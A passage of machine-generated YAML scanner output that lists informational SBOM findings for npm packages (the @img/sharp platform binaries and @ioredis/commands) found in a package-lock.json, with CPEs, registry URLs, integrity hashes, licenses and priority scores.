accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-linux-ppc64:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux-ppc64:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_ppc64:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_ppc64:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-linux-ppc64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-linux-ppc64/-/sharp-linux-ppc64-0.34.5.tgz
integrity: sha512-7zznwNaqW6YtsfrGGDA6BRkISKAAE1Jo0QdpNYXNMHu2+0dTrPflTLNkpc8l7MUP5M16ZJcUvysVWWrMefZquA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7bce516733b8ed22
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-linux-riscv64 0.34.5'
title: '@img/sharp-linux-riscv64 0.34.5'
description: 'Package discovered: @img/sharp-linux-riscv64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 523b83e120964834
name: '@img/sharp-linux-riscv64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-linux-riscv64:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux-riscv64:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_riscv64:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_riscv64:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-linux-riscv64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-linux-riscv64/-/sharp-linux-riscv64-0.34.5.tgz
integrity: sha512-51gJuLPTKa7piYPaVs8GmByo7/U7/7TZOq+cnXJIHZKavIRHAP77e3N2HEl3dgiqdD/w0yUfiJnII77PuDDFdw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 95b5e1930a0a90db
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-linux-s390x 0.34.5'
title: '@img/sharp-linux-s390x 0.34.5'
description: 'Package discovered: @img/sharp-linux-s390x 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: cdcec5be4d61926b
name: '@img/sharp-linux-s390x'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-linux-s390x:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux-s390x:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_s390x:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_s390x:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-linux-s390x@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-linux-s390x/-/sharp-linux-s390x-0.34.5.tgz
integrity: sha512-nQtCk0PdKfho3eC5MrbQoigJ2gd1CgddUMkabUj+rBevs8tZ2cULOx46E7oyX+04WGfABgIwmMC0VqieTiR4jg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ba4a76a3169a3261
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-linux-x64 0.34.5'
title: '@img/sharp-linux-x64 0.34.5'
description: 'Package discovered: @img/sharp-linux-x64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8ea3a106d5c8d10b
name: '@img/sharp-linux-x64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-linux-x64:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux-x64:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_x64:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux_x64:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-linux-x64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-linux-x64/-/sharp-linux-x64-0.34.5.tgz
integrity: sha512-MEzd8HPKxVxVenwAa+JRPwEC7QFjoPWuS5NZnBt6B3pu7EG2Ge0id1oLHZpPJdn3OQK+BQDiw9zStiHBTJQQQQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 357195decb462ec7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-linuxmusl-arm64 0.34.5'
title: '@img/sharp-linuxmusl-arm64 0.34.5'
description: 'Package discovered: @img/sharp-linuxmusl-arm64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c5d74af075cbec8c
name: '@img/sharp-linuxmusl-arm64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-arm64:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-arm64:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_arm64:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_arm64:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-linuxmusl-arm64/-/sharp-linuxmusl-arm64-0.34.5.tgz
integrity: sha512-fprJR6GtRsMt6Kyfq44IsChVZeGN97gTD331weR1ex1c1rypDEABN6Tm2xa1wE6lYb5DdEnk03NZPqA7Id21yg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5332b892777fe61c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-linuxmusl-x64 0.34.5'
title: '@img/sharp-linuxmusl-x64 0.34.5'
description: 'Package discovered: @img/sharp-linuxmusl-x64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 26c07c454ffe91ee
name: '@img/sharp-linuxmusl-x64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-x64:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-x64:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_x64:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_x64:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-linuxmusl-x64/-/sharp-linuxmusl-x64-0.34.5.tgz
integrity: sha512-Jg8wNT1MUzIvhBFxViqrEhWDGzqymo3sV7z7ZsaWbZNDLXRJZoRGrjulp60YYtV4wfY8VIKcWidjojlLcWrd8Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 34c9f7634c9fe393
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-wasm32 0.34.5'
title: '@img/sharp-wasm32 0.34.5'
description: 'Package discovered: @img/sharp-wasm32 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ef4974ec29f2dcac
name: '@img/sharp-wasm32'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0 AND LGPL-3.0-or-later AND MIT
spdxExpression: Apache-2.0 AND LGPL-3.0-or-later AND MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-wasm32:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-wasm32:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_wasm32:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_wasm32:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-wasm32@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-wasm32/-/sharp-wasm32-0.34.5.tgz
integrity: sha512-OdWTEiVkY2PHwqkbBI8frFxQQFekHaSSkUIJkwzclWZe64O1X4UlUjqqqLaPbUpMOQk6FBu/HtlGXNblIs0huw==
dependencies:
'@emnapi/runtime': ^1.7.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 866d76b99aec49d7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-win32-arm64 0.34.5'
title: '@img/sharp-win32-arm64 0.34.5'
description: 'Package discovered: @img/sharp-win32-arm64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b108eb8ed0a59806
name: '@img/sharp-win32-arm64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0 AND LGPL-3.0-or-later
spdxExpression: Apache-2.0 AND LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-win32-arm64:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-win32-arm64:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32_arm64:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32_arm64:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-win32-arm64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-win32-arm64/-/sharp-win32-arm64-0.34.5.tgz
integrity: sha512-WQ3AgWCWYSb2yt+IG8mnC6Jdk9Whs7O0gxphblsLvdhSpSTtmu69ZG1Gkb6NuvxsNACwiPV6cNSZNzt0KPsw7g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 574980068e294acc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-win32-ia32 0.34.5'
title: '@img/sharp-win32-ia32 0.34.5'
description: 'Package discovered: @img/sharp-win32-ia32 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8da96e6bc654731f
name: '@img/sharp-win32-ia32'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0 AND LGPL-3.0-or-later
spdxExpression: Apache-2.0 AND LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-win32-ia32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-win32-ia32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32_ia32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32_ia32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-win32-ia32@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-win32-ia32/-/sharp-win32-ia32-0.34.5.tgz
integrity: sha512-FV9m/7NmeCmSHDD5j4+4pNI8Cp3aW+JvLoXcTUo0IqyjSfAZJ8dIUmijx1qaJsIiU+Hosw6xM5KijAWRJCSgNg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ab5d55aa7d2a17c8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-win32-x64 0.34.5'
title: '@img/sharp-win32-x64 0.34.5'
description: 'Package discovered: @img/sharp-win32-x64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e8052476c35410ff
name: '@img/sharp-win32-x64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0 AND LGPL-3.0-or-later
spdxExpression: Apache-2.0 AND LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-win32-x64:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-win32-x64:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32_x64:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32_x64:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-win32-x64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-win32-x64/-/sharp-win32-x64-0.34.5.tgz
integrity: sha512-+29YMsqY2/9eFEiW93eqWnuLcWcufowXewwSNIT6UwZdUUCrM3oFjMWH/Z6/TMmb4hlFenmfAVbpWeup2jryCw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ab76bfe90efb399f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @ioredis/commands 1.5.1'
title: '@ioredis/commands 1.5.1'
description: 'Package discovered: @ioredis/commands 1.5.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 58cb7ee4da366532
name: '@ioredis/commands'
version: 1.5.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
